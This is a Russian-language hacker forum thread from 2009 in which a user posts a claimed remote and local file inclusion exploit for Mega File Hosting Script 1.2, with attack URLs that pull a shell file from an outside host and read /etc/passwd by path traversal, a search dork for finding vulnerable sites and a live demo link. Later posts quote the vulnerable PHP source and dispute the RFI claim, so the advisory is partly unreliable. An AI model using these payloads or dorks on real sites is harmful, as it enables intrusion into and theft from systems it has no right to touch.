Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability |
18.03.2009, 00:32
|
|
Новичок
Регистрация: 11.03.2009
Сообщений: 7
Провел на форуме:
14042
Репутация:
2
|
|
Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability
удаленный / локальный файл включения
для 1.2 версий 
#############################################
# Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability #
# Home: #
# Www.hacking.ge #
#############################################
#############################################
Просто помимо этого Exploit и наслаждайтесь #
#############################################
RFI: /cross.php?url=http://site.ru/shell.txt
LFI: /cross.php?url=../../../../../../../../etc/passwd%00
#############################################
#
Author: Garry /// 25/02/2009 #
#
#############################################
Последний раз редактировалось GarryCka; 19.03.2009 в 20:56..
Причина: удаленный / локальный файл включения
|
|
|
18.03.2009, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
А Дорк?
|
|
|
|
18.03.2009, 01:15
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Мде...........
|
|
|
|
18.03.2009, 01:26
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
с доркам та все понятно("Powered by: MFH v1"), life example где? скока не гуглил не нащел cross.php?url=, в каком собствено каталоге лежит cross.php? Имхо [:](||||||)[:].
ТС покажи где он тут http://sharemee.co.uk/ например
Последний раз редактировалось PaCo; 18.03.2009 в 01:28..
|
|
|
|
18.03.2009, 01:27
|
|
Новичок
Регистрация: 11.03.2009
Сообщений: 7
Провел на форуме:
14042
Репутация:
2
|
|
Дорк на Mega file hosting сайта:
"Powered by: MFH " |
|
|
|
18.03.2009, 01:33
|
|
Новичок
Регистрация: 11.03.2009
Сообщений: 7
Провел на форуме:
14042
Репутация:
2
|
|
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif
&
и локальный файл включения в Linux-сервер:
cross.php?url=../../../../../../../../etc/passwd%00 |
|
|
|
18.03.2009, 01:44
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Это код из cross.php
PHP код:
if(function_exists('curl_init'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
elseif(ini_get('allow_url_fopen'))
{
echo file_get_contents( ($url.'?'.$myquery.'IP_CGI='.$_SERVER['REMOTE_ADDR']) );
}
}
Последний раз редактировалось jokester; 18.03.2009 в 02:17..
|
|
|
|
18.03.2009, 01:47
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Сообщение от GarryCka
Demo : http://yabsoft.info/demo/mfhs/cross.php?url=http://forum.antichat.ru/antichat/pic/logo.gif
&
и локальный файл включения в Linux-сервер:
cross.php?url=../../../../../../../../etc/passwd%00 Че та я сомневаюсь про локальные файлы, да и это не RFI - remote file include - там нету иньекта а просто чтения файла и скорее всего не локального а удаленого, да и зачем %00 ? В http://forum.antichat.ru/antichat/pic/logo.gif судя по этому ничего не добавялеться, короче скорее всего удаленые файлы просто читаються и все.
UPD покамись писал jokester все подтвердил ТС это баян, разве что как прокси использовать, вот так будет не плохая идея насчет прокси халявных
Последний раз редактировалось PaCo; 18.03.2009 в 01:51..
|
|
|
|
18.03.2009, 01:47
|
|
Новичок
Регистрация: 11.03.2009
Сообщений: 7
Провел на форуме:
14042
Репутация:
2
|
|
jokester
Да, это ошибка основана на меня
|
|
|
|
18.03.2009, 01:49
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от GarryCka
jokester
Да, это ошибка основана на меня
Не понял фразы поясни пожалуйста
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
